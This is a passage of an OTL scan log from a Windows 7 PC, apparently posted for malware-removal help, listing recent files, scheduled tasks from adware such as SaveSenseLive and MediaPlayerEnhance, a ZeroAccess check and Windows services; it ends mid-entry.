Media Player ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7 ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\windows\System32\ie4uinit.exe -UserConfig ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding ActiveX: {C6BAF60B-6E91-453F-BFF9-D3789CFEFCDD} - .NET Framework ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts ActiveX: {D27CDB6E-AE6D-11CF-96B8-444553540000} - ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP ActiveX: >{97b59324-a6df-42c6-b5aa-c2eb21376cae} - RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP Drivers32: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS) Drivers32: MSVideo8 - C:\windows\System32\vfwwdm32.dll (Microsoft Corporation) Drivers32: vidc.cvid - C:\windows\System32\iccvid.dll (Radius Inc.) 
PhysicalDisk0 MBR saved to C:\PhysicalMBR.bin
CREATERESTOREPOINT
Restore point Set: OTL Restore Point

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2014/02/22 17:01:16 | 000,000,000 | ---D | C] -- C:\Program Files\Systweak Support Dock
[2014/02/22 16:53:16 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\Advanced System Protector
[2014/02/22 16:52:43 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\systweak
[2014/02/22 16:52:41 | 000,000,000 | ---D | C] -- C:\Program Files\RegClean Pro
[2014/02/22 16:42:14 | 000,000,000 | ---D | C] -- C:\Program Files\FindRight
[2014/02/22 16:13:43 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Maintenance Service
[2014/02/22 12:12:20 | 000,000,000 | ---D | C] -- C:\ProgramData\SaveSenseLive
[2014/02/22 09:29:26 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\Desktop\PB INFORMATIQUE
[2014/02/22 06:51:28 | 000,000,000 | ---D | C] -- C:\Program Files\ZHPDiag
[2014/02/22 06:51:28 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\ZHP
[2014/02/22 06:33:37 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/02/22 06:17:58 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware
[2014/02/21 22:13:48 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\SUPERAntiSpyware.com
[2014/02/21 22:13:06 | 000,000,000 | ---D | C] -- C:\ProgramData\SUPERAntiSpyware.com
[2014/02/21 22:13:06 | 000,000,000 | ---D | C] -- C:\Program Files\SUPERAntiSpyware
[2014/02/19 16:15:31 | 007,873,896 | ---- | C] (GSC Game World) -- C:\windows\System32\protect.dll
[2014/02/19 16:15:03 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\dll-files.com
[2014/02/19 16:14:53 | 000,000,000 | ---D | C] -- C:\ProgramData\Logs
[2014/02/19 16:14:45 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dll-Files Fixer
[2014/02/19 16:14:44 | 000,000,000 | ---D | C] -- C:\Program Files\Dll-Files.com Fixer
[2014/02/18 19:43:11 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\Desktop\Nouveau dossier [2014/02/18 11:27:27 | 000,000,000 | ---D | C] -- C:\windows\pss [2014/02/17 16:30:49 | 000,238,080 | ---- | C] (Hewlett-Packard) -- C:\windows\System32\hpbcoins32.dll [2014/02/17 16:30:37 | 000,291,840 | ---- | C] (Hewlett-Packard Corporation) -- C:\windows\System32\hpcpn117.dll [2014/02/17 16:28:51 | 000,000,000 | ---D | C] -- C:\ProgramData\HP [2014/02/16 16:57:31 | 000,000,000 | ---D | C] -- C:\windows\Migration [2014/02/16 16:15:22 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Local\SaveSense [2014/02/12 20:41:31 | 000,000,000 | ---D | C] -- C:\Program Files\SaveSenseLive [2014/02/12 20:39:45 | 000,293,984 | ---- | C] (Objectify Media Inc) -- C:\windows\System32\PCProtect.dll [2014/02/12 20:39:11 | 000,000,000 | ---D | C] -- C:\Program Files\Web Protect [2014/02/12 20:37:46 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\Nouveau dossier [2014/02/12 09:53:34 | 002,724,864 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\mshtml.tlb [2014/02/12 09:53:34 | 000,440,832 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ieui.dll [2014/02/12 09:53:34 | 000,208,896 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ie4uinit.exe [2014/02/12 09:53:34 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ieetwcollectorres.dll [2014/02/12 09:53:33 | 000,164,864 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\msrating.dll [2014/02/12 09:53:33 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\iesetup.dll [2014/02/12 09:53:33 | 000,043,008 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\jsproxy.dll [2014/02/12 09:53:32 | 000,553,472 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\jscript9diag.dll [2014/02/12 09:53:32 | 000,112,128 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ieUnatt.exe [2014/02/12 09:53:32 | 000,108,032 | ---- | C] (Microsoft 
Corporation) -- C:\windows\System32\ieetwcollector.exe [2014/02/12 09:53:32 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ieetwproxystub.dll [2014/02/12 09:53:32 | 000,032,768 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\iernonce.dll [2014/02/12 09:53:31 | 000,703,488 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ieapfltr.dll [2014/02/12 09:53:31 | 000,524,288 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\msfeeds.dll [2014/02/12 09:53:28 | 001,964,032 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\inetcpl.cpl [2014/02/12 09:53:25 | 004,244,480 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\jscript9.dll [2014/02/12 09:28:03 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\msxml3r.dll [2014/02/12 09:27:40 | 003,419,136 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\d2d1.dll [2014/02/12 09:27:40 | 001,987,584 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\d3d10warp.dll [2014/02/12 09:27:25 | 000,594,944 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\RMActivate_isv.exe [2014/02/12 09:27:25 | 000,572,416 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\RMActivate.exe [2014/02/12 09:27:25 | 000,510,976 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\RMActivate_ssp.exe [2014/02/12 09:27:25 | 000,508,928 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\RMActivate_ssp_isv.exe [2014/02/12 09:27:24 | 000,428,032 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\secproc.dll [2014/02/12 09:27:24 | 000,423,936 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\secproc_isv.dll [2014/02/12 09:27:24 | 000,390,144 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\msdrm.dll [2014/02/12 09:27:24 | 000,087,040 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\secproc_ssp_isv.dll [2014/02/12 09:27:24 | 000,087,040 | ---- | C] (Microsoft Corporation) -- 
C:\windows\System32\secproc_ssp.dll [2014/02/12 09:19:46 | 000,000,000 | ---D | C] -- C:\ProgramData\UTubeAdBllOCk [2014/02/12 09:18:01 | 000,000,000 | ---D | C] -- C:\Program Files\Bench [2014/02/11 19:21:08 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Local\SwvUpdater [2014/02/11 19:21:05 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\.android [2014/02/11 19:21:03 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\newnext.me [2014/02/11 19:21:03 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Local\cache [2014/02/11 19:21:02 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Local\Mobogenie [2014/02/11 19:21:02 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Local\genienext [2014/02/11 19:20:37 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\ValueApps [2014/02/11 19:20:03 | 000,000,000 | ---D | C] -- C:\Program Files\MediaPlayerEnhance [2014/02/11 19:19:41 | 000,000,000 | ---D | C] -- C:\ProgramData\IePluginService [2014/02/11 19:19:37 | 000,000,000 | ---D | C] -- C:\Program Files\SupTab [2014/02/11 19:18:23 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Local\fst_fr_83 [2014/02/11 19:18:22 | 000,000,000 | ---D | C] -- C:\Program Files\fst_fr_83 [2014/02/04 08:46:41 | 000,000,000 | ---D | C] -- C:\ProgramData\WinFilter [2014/01/31 18:15:17 | 000,000,000 | ---D | C] -- C:\Program Files\Adblock Plus for IE [2014/01/31 18:15:11 | 000,000,000 | ---D | C] -- C:\ProgramData\Package Cache [2 C:\windows\*.tmp files -> C:\windows\*.tmp -> ] [1 C:\windows\System32\*.tmp files -> C:\windows\System32\*.tmp -> ] [1 C:\Users\APPE-ATELIER\*.tmp files -> C:\Users\APPE-ATELIER\*.tmp -> ] [color=#E56717]========== Files - Modified Within 30 Days ==========[/color] [2014/02/23 11:07:16 | 000,000,512 | ---- | M] () -- C:\PhysicalMBR.bin [2014/02/23 11:02:00 | 000,001,002 | ---- | M] () -- C:\windows\tasks\Google Software Updater.job [2014/02/23 10:54:47 | 000,022,688 | -H-- | M] () -- 
C:\windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 [2014/02/23 10:54:47 | 000,022,688 | -H-- | M] () -- C:\windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 [2014/02/23 10:47:41 | 000,001,600 | ---- | M] () -- C:\windows\tasks\MediaPlayerEnhance-updater.job [2014/02/23 10:47:31 | 000,002,388 | ---- | M] () -- C:\windows\tasks\MediaPlayerEnhance-firefoxinstaller.job [2014/02/23 10:47:26 | 000,002,102 | ---- | M] () -- C:\windows\tasks\Plus-HD-5.7-chromeinstaller.job [2014/02/23 10:47:25 | 000,002,112 | ---- | M] () -- C:\windows\tasks\Plus-HD-5.7-firefoxinstaller.job [2014/02/23 10:47:25 | 000,001,326 | ---- | M] () -- C:\windows\tasks\Plus-HD-5.7-updater.job [2014/02/23 10:47:24 | 000,001,454 | ---- | M] () -- C:\windows\tasks\MediaPlayerEnhance-enabler.job [2014/02/23 10:47:19 | 000,002,422 | ---- | M] () -- C:\windows\tasks\MediaPlayerEnhance-validator.job [2014/02/23 10:47:14 | 000,000,928 | ---- | M] () -- C:\windows\tasks\SaveSenseLiveUpdateTaskMachineCore.job [2014/02/23 10:47:14 | 000,000,384 | ---- | M] () -- C:\windows\tasks\AmiUpdXp.job [2014/02/23 10:47:13 | 000,001,556 | ---- | M] () -- C:\windows\tasks\MediaPlayerEnhance-codedownloader.job [2014/02/23 10:47:13 | 000,001,150 | ---- | M] () -- C:\windows\tasks\Plus-HD-5.7-enabler.job [2014/02/23 10:47:12 | 000,001,278 | ---- | M] () -- C:\windows\tasks\Plus-HD-5.7-codedownloader.job [2014/02/23 10:47:12 | 000,001,064 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineCore.job [2014/02/23 10:46:48 | 000,067,584 | --S- | M] () -- C:\windows\bootstat.dat [2014/02/23 10:46:45 | 3116,646,400 | -HS- | M] () -- C:\hiberfil.sys [2014/02/22 19:37:05 | 000,001,068 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineUA.job [2014/02/22 17:29:40 | 000,000,000 | ---- | M] () -- C:\Users\APPE-ATELIER\sfc [2014/02/22 16:44:04 | 000,000,278 | ---- | M] () -- C:\windows\tasks\DLL-Files.Com Fixer_MONTHLY.job 
[2014/02/22 16:42:56 | 000,000,294 | ---- | M] () -- C:\windows\tasks\DLL-Files.Com Fixer_Updates.job [2014/02/22 16:20:14 | 000,000,932 | ---- | M] () -- C:\windows\tasks\SaveSenseLiveUpdateTaskMachineUA.job [2014/02/22 16:07:34 | 000,000,286 | ---- | M] () -- C:\windows\tasks\DLL-Files FixerASKUSER.job [2014/02/22 06:59:54 | 000,000,512 | ---- | M] () -- C:\PhysicalDisk0_MBR.bin [2014/02/22 06:14:00 | 000,000,524 | ---- | M] () -- C:\windows\tasks\SUPERAntiSpyware Scheduled Task 7d5b8c7f-bf69-4883-ae0b-c5735270b60e.job [2014/02/19 16:16:42 | 007,873,896 | ---- | M] (GSC Game World) -- C:\windows\System32\protect.dll [2014/02/19 16:14:45 | 000,001,046 | ---- | M] () -- C:\Users\Public\Desktop\Dll-Files Fixer.lnk [2014/02/19 16:02:54 | 000,759,410 | ---- | M] () -- C:\windows\System32\perfh00C.dat [2014/02/19 16:02:54 | 000,665,668 | ---- | M] () -- C:\windows\System32\perfh009.dat [2014/02/19 16:02:54 | 000,155,440 | ---- | M] () -- C:\windows\System32\perfc00C.dat [2014/02/19 16:02:54 | 000,127,084 | ---- | M] () -- C:\windows\System32\perfc009.dat [2014/02/19 10:26:01 | 000,000,346 | ---- | M] () -- C:\windows\tasks\bench-sys.job [2014/02/19 10:07:21 | 000,000,290 | RHS- | M] () -- C:\Users\APPE-ATELIER\ntuser.pol [2014/02/17 13:49:07 | 000,000,348 | ---- | M] () -- C:\windows\tasks\HPCeeScheduleForAPPE-ATELIER.job [2014/02/17 13:48:59 | 000,489,840 | ---- | M] () -- C:\windows\System32\FNTCACHE.DAT [2014/02/14 17:31:05 | 000,000,408 | ---- | M] () -- C:\windows\tasks\Maintenance en 1 clic.job [2014/02/12 20:39:55 | 000,008,800 | ---- | M] () -- C:\windows\System32\PCProtect.ini [2014/02/12 20:39:55 | 000,002,184 | ---- | M] () -- C:\windows\System32\PCProtectOff.ini [2014/02/12 13:17:06 | 000,000,290 | RHS- | M] () -- C:\ProgramData\ntuser.pol [2014/02/11 19:20:52 | 000,001,423 | ---- | M] () -- C:\Users\APPE-ATELIER\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk [2014/02/09 12:39:43 | 000,002,465 | ---- | M] () 
-- C:\Users\APPE-ATELIER\Desktop\36 Dictionnaires et Recueils de Correspondance.lnk [2014/02/06 11:20:26 | 002,724,864 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\mshtml.tlb [2014/02/06 11:19:55 | 000,004,096 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ieetwcollectorres.dll [2014/02/06 11:01:36 | 000,061,952 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\iesetup.dll [2014/02/06 11:00:46 | 000,051,200 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ieetwproxystub.dll [2014/02/06 10:52:56 | 000,043,008 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\jsproxy.dll [2014/02/06 10:52:21 | 000,032,768 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\iernonce.dll [2014/02/06 10:49:22 | 000,440,832 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ieui.dll [2014/02/06 10:47:22 | 000,112,128 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ieUnatt.exe [2014/02/06 10:47:18 | 000,108,032 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ieetwcollector.exe [2014/02/06 10:46:27 | 000,553,472 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\jscript9diag.dll [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ie4uinit.exe [2014/02/06 10:25:43 | 000,164,864 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\msrating.dll [2014/02/06 10:25:36 | 004,244,480 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\jscript9.dll [2014/02/06 10:13:13 | 000,524,288 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\msfeeds.dll [2014/02/06 10:09:30 | 001,964,032 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\inetcpl.cpl [2014/02/06 09:34:31 | 000,703,488 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ieapfltr.dll [2014/02/04 06:36:36 | 000,033,864 | ---- | M] () -- C:\windows\Launcher.exe [2014/02/03 03:00:36 | 000,487,508 | ---- | M] () -- C:\monitor.exe [2014/01/26 21:22:00 | 000,000,334 | ---- | 
M] () -- C:\windows\tasks\File Helper.job [2014/01/26 16:24:12 | 000,000,127 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\WB.CFG [2 C:\windows\*.tmp files -> C:\windows\*.tmp -> ] [1 C:\windows\System32\*.tmp files -> C:\windows\System32\*.tmp -> ] [1 C:\Users\APPE-ATELIER\*.tmp files -> C:\Users\APPE-ATELIER\*.tmp -> ] [color=#E56717]========== Files Created - No Company Name ==========[/color] [2014/02/23 11:07:16 | 000,000,512 | ---- | C] () -- C:\PhysicalMBR.bin [2014/02/22 17:29:40 | 000,000,000 | ---- | C] () -- C:\Users\APPE-ATELIER\sfc [2014/02/22 16:13:48 | 000,001,117 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk [2014/02/22 06:59:54 | 000,000,512 | ---- | C] () -- C:\PhysicalDisk0_MBR.bin [2014/02/21 22:14:01 | 000,000,524 | ---- | C] () -- C:\windows\tasks\SUPERAntiSpyware Scheduled Task 7d5b8c7f-bf69-4883-ae0b-c5735270b60e.job [2014/02/19 16:16:46 | 000,000,286 | ---- | C] () -- C:\windows\tasks\DLL-Files FixerASKUSER.job [2014/02/19 16:15:13 | 000,000,294 | ---- | C] () -- C:\windows\tasks\DLL-Files.Com Fixer_Updates.job [2014/02/19 16:15:13 | 000,000,278 | ---- | C] () -- C:\windows\tasks\DLL-Files.Com Fixer_MONTHLY.job [2014/02/19 16:14:45 | 000,001,046 | ---- | C] () -- C:\Users\Public\Desktop\Dll-Files Fixer.lnk [2014/02/12 20:41:39 | 000,000,932 | ---- | C] () -- C:\windows\tasks\SaveSenseLiveUpdateTaskMachineUA.job [2014/02/12 20:41:38 | 000,000,928 | ---- | C] () -- C:\windows\tasks\SaveSenseLiveUpdateTaskMachineCore.job [2014/02/12 20:39:55 | 000,020,480 | ---- | C] () -- C:\windows\System32\drivers\pcwatch.sys [2014/02/12 20:39:55 | 000,008,800 | ---- | C] () -- C:\windows\System32\PCProtect.ini [2014/02/12 20:39:55 | 000,002,184 | ---- | C] () -- C:\windows\System32\PCProtectOff.ini [2014/02/12 09:18:02 | 000,000,346 | ---- | C] () -- C:\windows\tasks\bench-sys.job [2014/02/11 19:21:10 | 000,000,384 | ---- | C] () -- C:\windows\tasks\AmiUpdXp.job [2014/02/11 19:20:43 | 000,001,600 | 
---- | C] () -- C:\windows\tasks\MediaPlayerEnhance-updater.job [2014/02/11 19:20:40 | 000,001,454 | ---- | C] () -- C:\windows\tasks\MediaPlayerEnhance-enabler.job [2014/02/11 19:20:35 | 000,001,556 | ---- | C] () -- C:\windows\tasks\MediaPlayerEnhance-codedownloader.job [2014/02/11 19:20:18 | 000,002,388 | ---- | C] () -- C:\windows\tasks\MediaPlayerEnhance-firefoxinstaller.job [2014/02/11 19:20:06 | 000,002,422 | ---- | C] () -- C:\windows\tasks\MediaPlayerEnhance-validator.job [2014/02/09 12:39:43 | 000,002,465 | ---- | C] () -- C:\Users\APPE-ATELIER\Desktop\36 Dictionnaires et Recueils de Correspondance.lnk [2014/02/03 03:00:36 | 000,487,508 | ---- | C] () -- C:\monitor.exe [2014/01/17 12:53:39 | 000,000,290 | RHS- | C] () -- C:\Users\APPE-ATELIER\ntuser.pol [2013/12/21 16:24:03 | 000,000,127 | ---- | C] () -- C:\Users\APPE-ATELIER\AppData\Roaming\WB.CFG [2013/10/31 18:57:27 | 000,000,079 | ---- | C] () -- C:\windows\wininit.ini [2013/08/27 08:42:27 | 000,033,864 | ---- | C] () -- C:\windows\Launcher.exe [2013/03/25 18:28:44 | 000,164,736 | ---- | C] () -- C:\windows\System32\drivers\aswVmm.sys [2013/03/25 18:28:44 | 000,049,248 | ---- | C] () -- C:\windows\System32\drivers\aswRvrt.sys [2012/03/26 09:52:15 | 000,021,240 | ---- | C] () -- C:\windows\System32\solidlocalmon.dll [2012/03/26 09:52:15 | 000,013,560 | ---- | C] () -- C:\windows\System32\solidlocalui.dll [2012/03/26 09:07:31 | 000,098,304 | ---- | C] () -- C:\windows\System32\redmonnt.dll [2012/02/28 08:46:49 | 000,001,684 | ---- | C] () -- C:\windows\System32\ASOROSet.bin [2012/02/19 08:51:43 | 000,000,041 | ---- | C] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Offre.ini [2011/06/16 16:18:58 | 000,001,940 | ---- | C] () -- C:\Users\APPE-ATELIER\AppData\Local\{96C87F53-AC72-4604-A9CC-186A49F17F3C}.ini [2011/05/24 15:19:12 | 000,098,304 | ---- | C] () -- C:\Users\APPE-ATELIER\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2011/03/07 09:00:09 | 000,001,849 | ---- | C] () -- 
C:\Users\APPE-ATELIER\AppData\Roaming\GhostObjGAFix.xml [2011/03/06 09:51:56 | 000,000,088 | RHS- | C] () -- C:\ProgramData\DF34F00615.sys [2011/02/12 17:27:24 | 000,002,828 | -HS- | C] () -- C:\ProgramData\KGyGaAvL.sys [2010/12/06 12:11:30 | 000,000,290 | RHS- | C] () -- C:\ProgramData\ntuser.pol [color=#E56717]========== ZeroAccess Check ==========[/color] [2009/07/14 05:42:31 | 000,000,227 | RHS- | M] () -- C:\windows\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] [HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] "" = %SystemRoot%\system32\shell32.dll -- [2013/07/26 02:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] "" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 13:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] "" = %systemroot%\system32\wbem\wbemess.dll -- [2009/07/14 02:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Both [color=#E56717]========== Custom Scans ==========[/color] [color=#E56717]========== Base Services ==========[/color] SRV - [2009/07/14 02:14:53 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\aelupsvc.dll -- (AeLookupSvc) SRV - [2013/02/27 05:49:16 | 000,047,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\appinfo.dll -- (Appinfo) SRV - [2009/07/14 02:14:11 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\alg.exe -- (ALG) SRV - [2010/11/20 13:20:58 | 000,585,728 | ---- | M] (Microsoft Corporation) [Auto 
| Running] -- C:\Windows\System32\qmgr.dll -- (BITS) SRV - [2010/11/20 13:18:06 | 000,494,592 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\BFE.DLL -- (BFE) SRV - [2013/09/25 01:49:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\lsass.exe -- (KeyIso) SRV - [2009/07/14 02:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\es.dll -- (EventSystem) SRV - [2012/07/04 22:14:34 | 000,102,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\browser.dll -- (Browser) SRV - [2013/07/09 05:46:31 | 000,140,288 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\cryptsvc.dll -- (CryptSvc) SRV - [2010/11/20 13:21:03 | 000,376,832 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\rpcss.dll -- (DcomLaunch) SRV - [2010/11/20 13:18:30 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\dhcpcore.dll -- (Dhcp) SRV - [2011/03/03 06:38:01 | 000,132,608 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\dnsrslvr.dll -- (Dnscache) SRV - [2009/07/14 02:15:13 | 000,098,304 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\eapsvc.dll -- (EapHost) SRV - [2009/07/14 02:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\hidserv.dll -- (hidserv) SRV - [2009/07/14 02:15:33 | 000,300,544 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\ipnathlp.dll -- (SharedAccess) SRV - [2010/11/20 13:19:23 | 000,350,208 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\IPSECSVC.DLL -- (PolicyAgent) No service found with a name of MsMpSvc No service found with a name of NisSrv SRV - [2009/07/14 02:16:15 | 000,313,856 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\swprv.dll 
-- (swprv) SRV - [2009/07/14 02:15:41 | 000,049,664 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\System32\mmcss.dll -- (MMCSS) SRV - [2009/07/14 02:16:03 | 000,280,576 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\netman.dll -- (Netman) SRV - [2009/07/14 02:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\netprofm.dll -- (netprofm) SRV - [2012/10/03 17:42:26 | 000,242,176 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\nlasvc.dll -- (NlaSvc) SRV - [2009/07/14 02:16:11 | 000,019,456 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\nsisvc.dll -- (nsi) SRV - [2011/05/24 11:44:59 | 000,293,376 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\umpnpmgr.dll -- (PlugPlay) SRV - [2012/02/11 06:37:49 | 000,317,440 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\spoolsv.exe -- (Spooler) SRV - [2013/09/25 01:49:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\lsass.exe -- (ProtectedStorage) No service found with a name of EMDMgmt SRV - [2009/07/14 02:16:12 | 000,090,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\rasauto.dll -- (RasAuto) SRV - [2010/11/20 13:21:00 | 000,286,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\rasmans.dll -- (RasMan) SRV - [2010/11/20 13:21:03 | 000,376,832 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\rpcss.dll -- (RpcSs) SRV - [2009/07/14 02:16:13 | 000,021,504 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\seclogon.dll -- (seclogon) SRV - [2013/09/25 01:49:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\lsass.exe -- (SamSs) SRV - [2009/07/14 02:16:20 | 000,073,728 | ---- | M] (Microsoft Corporation) 
